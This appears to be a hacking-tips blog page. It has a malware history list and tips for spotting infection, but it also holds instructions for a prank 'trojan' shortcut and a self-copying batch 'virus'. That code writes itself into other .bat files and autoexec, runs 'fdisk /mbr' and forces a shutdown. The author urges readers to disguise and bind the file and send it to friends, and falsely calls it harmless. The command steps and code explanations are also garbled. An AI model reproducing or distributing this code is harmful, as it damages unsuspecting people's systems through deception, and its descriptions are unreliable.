How to Create a Trojan Horse

Create A Trojan Horse Virus


How to make a trojan horse virus,well basically Trojan horse is not a virus,it's a malware,in computer,but generally we call it as a virsu,but how to make it,well i will teach you how to make a trojan horse Virus in 3 minutes,You can send this virus to your friends it,will not harm there computer but shut down there computer immediately,so let's start how to create a trojan horse virus.

First go to your desktop and then click Right mouse Button,and choose create new shortcut,a new shortcut icon will come on your window.

In the location type what i type
-s -t(# of seconds until shutdown.es:50)"(Any message of your choice.Example:Trojan Horse Acitivate)"

Name the file whatever you want it to call.

After doing all this your Trojan Horse Virus is ready to use,remember it will not harm your or your friend's computer it will Just shut down it.

To give your virus a Extremely Good look,To make your friends think about his computer choose an appropriate icon for it and then your Virus is ready to use send it to your friend in anyway.

Detect a virus without an antivirus

Do nothing and watch your Network Connection.Virus, Spyware and Worm always do their activity in silent by themselves or perfect crime as much as possible. But their activities can be detected with simple way, if you connect to the internet or in a network that connected to the internet, just do nothing with your computer and watch the network connection. If network connection show sending and receiving data all the time, it could be your computer have some of them. But makesure do not do any activity on your computer. If you cannot see the network connection, click Start -> Setting -> Control Panel -> Network Connection, there are icon with two monitors and keep blinking whenever there’s sending and receiving data. So what’s next?, Check the Speed and Compare. Maybe on number 1 you still cannot makesure your pc has been infected but you know your PC’s speed. Is it much slower or a bit slower? If your PC’s speed much slower than before, you can add more possibility that your PC has been infected. Check your Anti Virus Status.Most of smart Viruses, they able to shut down the Anti virus’s process and freely take over your pc, installing and duplicate themselves or calling their buddy on it. No wonder if they will make your PC suffer loaded by virus and spyware also their buddy. So if your anti virus is not active, be aware of their visit. Shutting down anti virus, usually done by virus, not worm or spyware. Check your MSCONFIG When virus, worm and spyware was infected, they will put themselves to be run automatically when windows start. You can check what kind of application that run in your PC. Clik start> on run type “msconfig” then enter. New window come up and open Startup Tab, check all applications one by one, usually their name is similar with name of application example, quick time with qt.exe,etc. If you suspect one of them as a virus, Uncheck the file and reboot. If your computer fell better, that file maybe the virus or spyware and rename the file become *.bak. But virus is smart, after you restart the computer, that file has been checked again. That’s mean you have to think over against them and war haven’t not over yet. Remember the history. “Please help, my computer go wild since two days ago”, for me that helpful statement to find virus. That statement could be refer to date when virus was infected. That means on that day, a new file contain virus was created. So let’s search and destroy, click start -> search -> for files or folder. On Search area, you will find unchecked Date and do check it. Choose file created on below and fill in the date your computer start not good. This way quite good enough to detect a virus, you will find lists of file that created on that day, not much on the list,that’s why it is easy. And next is to classified the executable file which have *.exe, *.bat, *.pif. Usually the same file is appear in startup tab (no.5). Suspect a file with above condition and makesure that’s not belong to your application such as MS WORD,EXCEL, etc. you can rename it into *.bak and restart. Ask to Mr. Google what file is this. If you are not sure with that, open the internet, type name of file in google.com or yahoo.com on keyword and added “virus” on the back. If on the result said that file is a virus, you can delete or rename it.

Top ten most dangerous virus

1. Sadmind worm (2001)
The Sadmind worm was a self-propagating piece of malware, It was first discovered on May 8, 2001 in china. Sadmind is designed to provide remote system administration operations and is installed by default with many versions of the Sun Microsystems operating system. It affected some big operating systems like Sun Microsystems Solaris(OS) and Microsoft's Internet Information Services (IIS) which is the world's second most popular web server in terms of overall websites behind the industry leader Apache HTTP Server.

2. Beast Trojan (2002)
Beast is a Windows-based backdoor trojan horse more commonly known in the underground cracker community as a RAT (Remote Administration Tool). It was created in Delphi and released first by its author Tataye in 2002. Beast was one of the first trojans to feature a 'reverse connection' to its victims and once established, it gave the attacker complete control over the infected computer.

Once connected to the victim computer, via Beast hacker can access victim's all computer file and directories along with the power to upload, download, delete or execute any file or folder.

3. SQL Slammer (2003)
Appeared first in 27th January 2003 and soon got a high rank in the list of most dangerous worms of the year because it is the first fileless worm. Slammer was able to spread by taking advantage of the vulnerability found in the SQL Server.

Slammer spread to over 90 percent of all vulnerable hosts in 10 minutes and infected around 359,000 computers total and according to London-based market intelligence the worm caused between $950 million and $1.2 billion in lost productivity in its first five days worldwide.

4. Sasser (2004)

Sasser is an Internet worm that probably caused around $18.1 billions of dollars of damage in 2004. It was created by a Computer science student, Sven Jaschan in Germany first seen on last day of april. While there was no intentionally destructive payload, Sasser did cause many computers to slow down or crash, causing some high profile damage.

And was destructive enough to shut down the satellite communications for some French news agencies. It also resulted in the cancellation of several Delta airline flights and the shutdown of numerous companies’ systems worldwide.

5. Bandook (2005)Bandook Rat is a backdoor trojan horse that infects Windows NT family systems (Windows 2000, XP, 2003, Vista). It uses a server creator, a client and a server to take control over the remote computer. It uses process hijacking / Kernel Patching to bypass the firewall, and allow the server component to hijack processes and gain rights for accessing the internet. It is somehow very similar to Beast Trojan (2002)


6. Nyxem (2006)
ALIAS: Mywife, Hunchi, I-Worm.Nyxem, Blackmal, Blueworm, Blackworm
Nyxem worm was first found on March, 2006. The worm spreads in e-mails using an external SMTP engine. It sends itself with different subjects, body text and attachment names. The worm also copies itself multiple times to an infected hard drive. Blackworm is designed to corrupt data on infected computers on February 3, 2006, in respect to The Day the Music Died.

The most scary thing in this worm is, It can deletes your antivirus programs, if they are installed in the same directories as the ones specified in the worm's code. It can also delete the entries in the Windows Registry belonging to these antivirus programs, so these applications will not be run automatically the next time Windows is started.

The worm also contains one GIF file which is used to make a recipient of infected e-mails think that the message was scanned by Norton Anti-Virus and no infection was found.

But its havoc ended soon and it gone off the records after October 26. 

7. Storm Worm (2007)

ALIAS: Small.dam, Trojan.Peacomm, Trojan.Peed, Trojan.Tibs, W32/ZhelatinBut soon after the Nyxem ended, a new virus has been discovered on January 17, 2007 named Storm Worm having the same functionality as Nyxem, It hides himself in a email attachments that had the following title line: "230 dead as storm batters Europe."  Users that opened the attachment let the virus come in their machines. This virus infected around 10 million computers worldwide and after the computer is infected it could be used to launch millions of spam emails that would advertise Web links. 

But it has also got some new features of stealing identity and according to the United States Federal Bureau of Investigation the Storm highly helped hackers in bank fraud, identity theft, and a number of other cybercrimes.

8. Conficker (2008)

Conficker is a computer worm targeting the Microsoft Windows operating system that was first detected 20th November 2008 affected more than seven million government, business and home computers in over 200 countries. 

The worm attacks the Microsoft vulnerability MS08-067 in Server Service which allows remote code execution. This vulnerability allows a remote attacker to run arbitrary code on the machine without authentication and take full control of the computer. Second, Conficker Worm uses the infected machine computing power to execute password brute force attacks to crack administrator passwords in the local network. This will allow the worm to spread through network shares as well.

The worm is said to have caused 9.1 billion in damage, mostly in Asia, South America and Europe. 

New versions of Conficker came with the power to
-Blocks DNS lookups.
-Disables AutoUpdate.
-Kills anti-malware.
-Scans for and terminates processes with names of anti-malware, patch or diagnostic utilities at one-second intervals.

Microsoft sets a bounty of $250,000 USD for information leading to the capture of the worm's author(s).

9. Daprosy Worm (2009)

Daprosy was first observed in early May 2009 and first announced to public as Daprosy trojan worm by Symantec on July 2009 . This worm is a malicious computer program that spreads via LAN connections, spammed e-mails and USB mass storage devices. Infection comes from a single read1st.exe filewhere several dozens of clones are created at once bearing the names of compromised folders. The most obvious symptom of Daprosy infection is the presence of Classified.exe or Do not open - secrets!.exe files from infected folders. 

The worm is known to destabilize, corrupt and even stall the operating system due to programming bugs. It appears that it is incomplete and was probably created by students or amateur Visual Basic programmers. As of October 2009 special scripts are available to remove it from infected computers but till then many Windows system were stalled.

10. Alureon (2010)

Alureon is a trojan and rootkit which is designed to steal data by intercepting a system's network traffic and searching it for usernames, passwords and credit card data. Microsoft has confirmed that Alureon is the cause of a series of BSoD problems on Windows systems which were triggered by Patch Tuesday update MS10-015. Microsoft will not install the patch on these systems. The Alureon rootkit was first seen in 2006 and now started affecting computers.

PCs become infected by downloading software also particularly off torrent sites and visiting certain posting sites.

How to create a virus

• Understand the following: It’s just a harmless “virus”. It only prints some scary messages and finally shuts down the computer. As you start it again, your computer will work as it did before!
• Read the virus: Below you see the Computer-Code that is executed as you start the virus. The lines that start with REM are comments that the computer ignores. The explain you what the above line does.

@echo off
title %0
rem conditional check.
echo welcome to this wonderful program! please wait while I delete all your files!
rem infection of the user
copy %0 c:tmp.bat >null attrib +r +s +h c:tmp.bat echo for %%i in (*.bat) do copy c:tmp.bat+%%i %%i >>c:windowssystem32autoexec.NT
echo echo virus detected! >>c:windowssystem32autoexec.NT
echo pause >>c:windowssystem32autoexec.NT
echo NT core:infected!
echo echo shame on you! >>c:autoexec.bat
echo echo system hault-virus identified! >>c:autoexec.bat
echo chkdsk >>c:autoexec.bat
echo i t i s t o o l a t e, y o u h a v e a v i r u s, n o w u r l i f e i s n o t b e a u t i f u l
fdisk /mbr
shutdown -s -t 03 -c “windows has shut down because the lsass service has incountered a write fault at 0×00000000000000000000000000000000000″

Code Details

@echo off
color 1a (Changes the colour)
echo (Displays a text)
echo: (leaves a line)
ping -n 2 127.0.0.1>nul (pings your localhost – nothing much)
shutdown.exe (shutdown)

1. Read and understand the warnings!
2. Open up Notepad in Windows. You can do this by navigating to Start > Programs > Accessories > Notepad, or simply by entering notepad under Start > Run.
3. Copy and Paste the Code of the “virus” into Notepad
4. Click File -> Save as
5. Decide for a location to save the fake-virus. You should chose a location where the user won’t find the file, so saving it on the desktop would be a bad idea!
6. Change “.txt” to “All files” in the file type drop-down menu
7. Chose a harmless filename. Replace the “.txt” at the with “.bat”
8. Click on save and close Notepad.

Now We Have Completed Making The Virus And Now We Must Bind The Virus With Any Other File
 After Binding The File Then Just Sent This File To Your Friends Then You can Just sit back and enjoy the show!